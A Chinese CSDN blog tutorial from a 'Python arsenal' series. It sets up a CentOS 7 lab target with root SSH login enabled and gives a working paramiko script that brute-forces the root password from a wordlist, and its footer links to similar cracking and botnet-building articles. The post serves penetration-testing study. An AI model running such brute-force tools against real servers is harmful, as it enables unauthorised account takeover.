Python武器库开发-武器库篇之SSH服务暴力破解(五十四)

于 2024-06-14 16:06:25 发布
阅读量1k 收藏 7
点赞数 15
分类专栏: Python武器库开发 文章标签: python ssh 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/139682669
版权

Python武器库开发-武器库篇之SSH服务暴力破解(五十四)

SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上提供安全的远程登录和文件传输功能。SSH可以在客户端和服务器之间建立安全的通信连接,确保通信数据的机密性和完整性。

SSH服务的主要功能包括:

  1. 远程登录:用户可以通过SSH协议在远程主机上执行命令,就像在本地主机上操作一样。

  2. 文件传输:SSH可以方便地传输文件和目录,支持上传和下载操作。

  3. 端口转发:SSH可以在远程主机和本地主机之间建立安全的端口转发通道,用于安全访问远程主机上的服务。

  4. X11转发:SSH支持X11图形界面的转发,使用户可以在本地主机上远程访问远程主机上运行的图形应用程序。

SSH协议使用公钥加密和密钥交换技术来确保数据的安全性。客户端和服务器之间建立通信连接时,会进行密钥交换过程,以确保通信双方都可以验证对方的身份,并协商出一个用于加密通信的共享密钥。这样,即使在不安全的网络上,也能保证通信的机密性和完整性。

环境准备

首先,我们需要准备一台Centos7机器作为靶机在CentOS 7上配置SSH服务的步骤如下:

  1. 确保系统已安装OpenSSH软件包。如果没有安装,可以使用以下命令安装:
sudo yum install openssh-server

在这里插入图片描述

  1. 启动SSH服务,使用以下命令启动SSH服务:
sudo systemctl start sshd

在这里插入图片描述

  1. 设置SSH服务开机自启,使用以下命令将SSH服务设置为开机自启:
sudo systemctl enable sshd

在这里插入图片描述

  1. (可选)如果需要修改SSH的默认配置,可以编辑SSH配置文件,使用以下命令打开SSH配置文件:
sudo vi /etc/ssh/sshd_config

在这里插入图片描述

在此文件中,您可以修改诸如监听端口、允许的用户、登录选项等等的设置,修改完后保存文件并退出。

我们在此文件中配置登录密码,首先使用文本编辑器(如vi或nano)打开配置文件,在文件中找到#PermitRootLogin的行,并将其取消注释(将#去掉)。在PermitRootLogin的后面添加一个空格和yes,以允许使用root用户登录。例如:PermitRootLogin yes。然后保存并关闭文件。

在这里插入图片描述

  1. (可选)如果有进行了配置文件的修改,需要重新加载SSH配置,使用以下命令重新加载SSH配置:
sudo systemctl reload sshd

在这里插入图片描述

  1. 配置防火墙允许SSH连接。默认情况下,CentOS7使用firewalld进行防火墙配置。如果没有禁用或修改防火墙设置,可以使用以下命令允许SSH连接:
sudo firewall-cmd --zone=public --add-service=ssh --permanent
sudo firewall-cmd --reload

破解代码

接下来我们用python写一段暴力破解SSH服务的代码,代码内容如下:

#!/usr/bin/env python

import paramiko
import socket
import time

host = "192.168.41.147"
#ssh用户
user = "root"
port = 21
passwords = open("PasswordFile.txt").read().split('\n')

def connect_ssh(password):
    #ssh客户端
    ssh_client = paramiko.SSHClient()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh_client.connect(hostname=host,password=password,username=user,timeout=10)
    except socket.timeout:
        print("连接超时")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] 账户密码错误 {user}:{password}")
        return False
    except paramiko.SSHException:
        print("内部错误,等待重连")
        time.sleep(10)
        return connect_ssh(password)
    else:
        print("[+] password found: ",password)
        exit(0)

for password in passwords:
    if connect_ssh(password):
        break

这段代码是一个用于SSH密码破解的脚本。它使用paramiko库来建立SSH连接,尝试使用从"PasswordFile.txt"文件中读取的密码列表进行身份验证。

首先,导入了paramikosockettime模块。然后,定义了一些变量,包括要连接的主机IP地址、SSH用户名、端口号和密码文件。

接下来,定义了一个名为connect_ssh的函数,该函数用于连接SSH并尝试使用给定的密码进行身份验证。函数内部使用了paramiko模块提供的SSHClient类进行SSH连接,并在连接过程中处理可能出现的异常情况。如果连接成功,将打印出找到的密码并退出程序。

最后,使用一个循环遍历密码文件中的每一个密码,并调用connect_ssh函数进行尝试。如果找到了正确的密码,将跳出循环。

运行实验

接下来我们在实际运行这段代码试验一下,如图成功暴力破解出了SSH服务的密码

在这里插入图片描述

怰月
关注
  • 15
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python安全渗透测试-SSH密码暴力破解渗透测试
旺仔Sec&blog
11-17 2134
第二步,使用ifconfig或ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行网络连通性测试,确保主机间网络的连通性;第三步,通过Python脚本语言自行开发渗透测试工具,实现判断SSH应用程序的版本信息,首先导入必要的Python模块。第七步,定义main函数执行的条件,确保main函数仅在模块__main__当中执行。第八步,执行脚本,如果存在root账号弱口令,则获取SSH服务器root账号登录密码。第五步,定义函数sshconn,该函数的作用为尝试连接SSH服务器。
超级齐全的Python IDE武器库大整理,这些优缺点一目了然!
码农黑羽的博客
12-16 317
前言 写 Python 代码最好的方式莫过于使用集成开发环境(IDE)了。它们不仅能使你的工作更加简单、更具逻辑性,还能够提升编程体验和效率。 每个人都知道这一点。而问题在于,如何从众多选项中选择最好的 Python 开发环境。初级开发者往往面临这个问题。 本文将概述最受程序员欢迎的 Python IDE,以及其他值得考虑的选项。在此之前,我们先来看看 IDE 是什么。 什么是 IDE?IDE 有什么用? IDE 是开发者创建程序时使用的软件包。它通过简单的用户界面集成多个高度关联...
暴力破解SSHPython源码
06-14
# sshBrute # ssh爆破工具 ## * 用途 基于字典文件破解ssh账号密码 ## * 依赖 pip install paramiko ## * 使用方法: Usage: sshBrute.py [options] host Options: -h, --help show this help message and exit -p PORT, --port=PORT port, default 22 -u USERNAME, --username=USERNAME username, default root(Linux) -f PWD_PATH, --file=PWD_PATH password dict file,default dict/password.txt ## * 其它 * sshBrute.py ,单线程实现 * sshBruteV2.py ,多线程实现
Python 渗透测试:SSH 加密通道 传输文件 爆破.(22 端口)
最新发布
网络安全领域___专研者.
05-17 417
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络环境中进行安全的远程连接和数据传输。SSH 爆破是一种常见的网络攻击手段,它试图通过暴力破解的方式获取远程 SSH 服务器的登录凭证。
手把手教你用Python进行SSH暴力破解
pdcfighting的博客
08-31 2085
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤青冥浩荡不见底,日月照耀金银台。暴力破解属于密码破解的一种,也是最常见的...
Python 运用Pexpect实现SSH爆破
热门推荐
CSDN
10-06 1万+
Pexpect是一个纯Python模块,用于生成子应用程序;控制他们;并对输出中的预期模式作出响应。Pexpect的工作原理类似于Don Libes的Expect。Pexpect允许脚本生成一个子应用程序,并像键入命令一样控制它。Pexpect可用于自动化交互应用程序,如ssh、ftp、passwd、telnet等。它可用于自动化安装脚本,以在不同服务器上复制软件包安装。它可以用于自动化软件测试。
Python库 | ssh-client-baoer-0.0.4.tar.gz
03-10
Pythonssh-client-baoer-0.0.4:远程运维与开发的得力助手》 在IT行业中,Python以其简洁的语法和强大的库支持成为开发者们的首选语言之一。当我们谈到Python在运维领域的应用时,SSH(Secure Shell)协议扮演...
java-php-python-ssm武器爱好者管理平台计算机毕业设计
adf5653的博客
11-27 114
前端技术:Layui、HTML、CSS、JS、JQuery等技术。jsp网上花卉销售系统的设计与实现sqlserver。springboot基于VUE的个人记账管理系统。ssm基于Java的高校教学资源库的设计与实现。springboot办公自动化系统的设计与实现。springboot通用项目的项目管理系统。ssm基于SSM的仓库管理系统的设计与实现。ssm基于SSM框架的毕业生离校管理系统。
java-net-php-python-jspm保险公司客户售后服务管理系统(修改后重录)计算机毕业设计程序
m0_72303790的博客
11-21 443
springboot基于springboot的健身俱乐部综合管理系统。jsp基于JavaEE技术的“日进斗金”理财大师系统设计与实现。ssm基于VUE.js的保护环境的App的开发与实现。ssm基于vue技术的汽车维修检测系统设计与实现。springboot基于VUE的个人记账管理系统。JSP影城管理系统的设计与实现sqlserver。jsp基于任务进度监督的软件项目实训管理系统。ssm基于ssm+vue的高校个性化选课推荐。JSP视频网站的设计与实现sqlserver。
net-java-php-python-医药库存管理系统计算机毕业设计程序
m0_73366170的博客
12-03 156
net-java-php-python-医药库存管理系统计算机毕业设计程序本源码技术栈:项目架构:B/S架构开发语言:Java语言开发软件:idea eclipse前端技术:Layui、HTML、CSS、JS、JQuery等技术后端技术:JAVA运行环境:Win10、JDK1.8数 据 库:MySQL5.7/8.0源码地址:https://pan.baidu.com/s/10fzyznRDrk38AKu6m_VEFA?pwd=h75i最新计算机专业原创开发毕业设计源码+数据库是近期作品
Python3小工具——暴力破解ssh
qq_43934844的博客
12-14 402
利用pxssh库进行暴力破解ssh。二、演示一下的利用效果。
Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
谢公子的博客
11-03 3948
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 login()、logout() 和 prompt() 等函数直接与SSH进行交互 。对于login()函数,如果执行成功则不会抛出异常,将显示消息表示密码已经找到并把表示密码已找到...
使用Python实现ssh暴力破解
单核CPU的小朋友的博客
03-22 1248
#!/usr/bin/python # -*- coding:utf-8 -*- import sshclass import sys import threading import time reload(sys) sys.setdefaultencoding('utf-8') __metaclass__ = type class Threadssh(threading.Thread): def __init__(self, func, args): threading.
Python绝技学习笔记-ssh暴力破解(多线程)
小傅
07-04 1114
1.开启多线程(t.start()后会继续运行,t.join()是等待子进程运行完毕) 2.Fail用于记录read_nonblocking和pxssh命令符提取失败的次数 3.maxConnections表示最大连接数(多线程,实际上是一个cpu在交替运行。。。。。) 代码编写思路: main()函数 1.解析参数 2.循环遍历密码文件(开启5个线程连接,这里开启线程速度会更快...
SSH暴力破解Python-pxssh实现
forbidd3n,keep going
08-14 5143
最近在看《Violent Python》,记录一些代码实现。 0x00 SSH暴力破解Python-pexssh实现 Pxssh是一个包含了pexpect库的专用脚本,它能用预先写好的login()、logout()、prompt()等函数直接与SSH进行交互。 简单示例: import pxssh def send_command(s, cmd): s.sendline(c
python—用Pxssh暴力破解SSH密码
qq_28840013的博客
11-29 1245
用Pxssh暴力破解SSH密码 参考于《python绝技 运用python成为顶级黑客》 SSH相关介绍: SSH是主要用于为远程登陆会话提供安全保障的协议(即实现远程命令行操作) SSH可提供两种级别的安全验证: 1.基于口令的安全验证: 通过帐号和密码登录到远程主机 攻击方式:暴力破解 / “中间人”攻击 2.基于密匙的安全验证: 需要依靠密匙,也就是你必须为自己创建一对密匙,并把公用...
python+pxssh+ssh用户密码暴力破解
一个喜欢哈士奇的中二少年
02-06 1736
from pexpect import pxssh import optparse import time from threading import * maxConnections=5 connection_lock=BoundedSemaphore(value=maxConnections) Found=False Fails=0 def connect(host,user,password
Python使用paramiko库实现SSH连接Linux并执行命令
"这文档介绍了如何使用Python的paramiko库在Windows环境下通过SSH协议登录Linux系统,并执行相关命令。" 在Python中,paramiko库是一个强大的实现SSHv2协议的库,它允许开发者进行安全的远程通信,包括登录Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值